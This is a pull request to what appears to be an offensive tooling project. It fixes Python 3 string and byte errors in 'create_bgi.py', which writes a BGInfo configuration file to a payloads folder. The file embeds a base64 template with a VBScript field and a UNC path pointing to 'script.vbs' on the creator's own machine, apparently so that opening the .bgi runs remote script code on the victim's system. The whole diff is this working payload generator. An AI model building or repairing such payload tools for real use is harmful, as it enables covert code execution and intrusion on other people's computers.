### PR TITLE
fixed encoding errors

### DIFF
--- a/resources/create_bgi.py
+++ b/resources/create_bgi.py
@@ -12,7 +12,7 @@ def get_ip_address():
     s.connect(("8.8.8.8", 80))
     return s.getsockname()[0]
 
-filePath = "\\\\" + get_ip_address() + "\update\script.vbs"
+filePath = "\\\\" + get_ip_address() + "\\update\\script.vbs"
 stringLenght = len(filePath) + 2
  
 fileContent = base64.b64decode("CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0aW9uAAQAAAAEAAAA/gMAAAgAAABNb25pdG9yAAQAAAAEAAAAXAQAAA4AAABUYXNrYmFyQWRqdXN0AAQAAAAEAAAAAQAAAAsAAABUZXh0V2lkdGgyAAQAAAAEAAAAwHsAAAsAAABPdXRwdXRGaWxlAAEAAAASAAAAJVRlbXAlXEJHSW5mby5ibXAACQAAAERhdGFiYXNlAAEAAAABAAAAAAwAAABEYXRhYmFzZU1SVQABAAAABAAAAAAAAAAKAAAAV2FsbHBhcGVyAAEAAAABAAAAAA0AAABXYWxscGFwZXJQb3MABAAAAAQAAAACAAAADgAAAFdhbGxwYXBlclVzZXIABAAAAAQAAAABAAAADQAAAE1heENvbG9yQml0cwAEAAAABAAAAAAAAAAMAAAARXJyb3JOb3RpZnkABAAAAAQAAAAAAAAACwAAAFVzZXJTY3JlZW4ABAAAAAQAAAABAAAADAAAAExvZ29uU2NyZWVuAAQAAAAEAAAAAAAAAA8AAABUZXJtaW5hbFNjcmVlbgAEAAAABAAAAAAAAAAOAAAAT3BhcXVlVGV4dEJveAAEAAAABAAAAAAAAAAEAAAAUlRGAAEAAADvAAAAe1xydGYxXGFuc2lcYW5zaWNwZzkzNlxkZWZmMFxkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUye1xmb250dGJse1xmMFxmbmlsXGZjaGFyc2V0MTM0IEFyaWFsO319DQp7XGNvbG9ydGJsIDtccmVkMjU1XGdyZWVuMjU1XGJsdWUyNTU7fQ0KXHZpZXdraW5kNFx1YzFccGFyZFxmaS0yODgwXGxpMjg4MFx0eDI4ODBcY2YxXGxhbmcyMDUyXGJccHJvdGVjdFxmMFxmczI0IDx2YnM+XHByb3RlY3QwXHBhcg0KXHBhcg0KfQ0KAAALAAAAVXNlckZpZWxkcwAAgACAAAAAAAQAAAB2YnMAAQAAAA==")
@@ -20,7 +20,7 @@ fileContent = base64.b64decode("CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0
 with open("/tmp/payloads/script.bgi", "wb") as bgi_file:
     bgi_file.write(fileContent)
     bgi_file.write(struct.pack("B", stringLenght))
-    bgi_file.write('\x00\x00\x00\x34')
+    bgi_file.write(b'\x00\x00\x00\x34')
     bgi_file.write(filePath.encode('ascii'))
-    bgi_file.write('\x00\x00\x00\x00\x00\x01\x80\x00\x80\x00\x00\x00\x00')
+    bgi_file.write(b'\x00\x00\x00\x00\x00\x01\x80\x00\x80\x00\x00\x00\x00')
 


### PR DESCRIPTION
Python had some problems with encoding of the strings:
```
create_bgi.py, line 15: unicodeescape codec can't decode bytes in position 0-1. [...]
create_bgi.py, line 23: TypeError: a bytes-like object is required, not str
```
I fixed these errors by introducing new backslashes and format specifiers.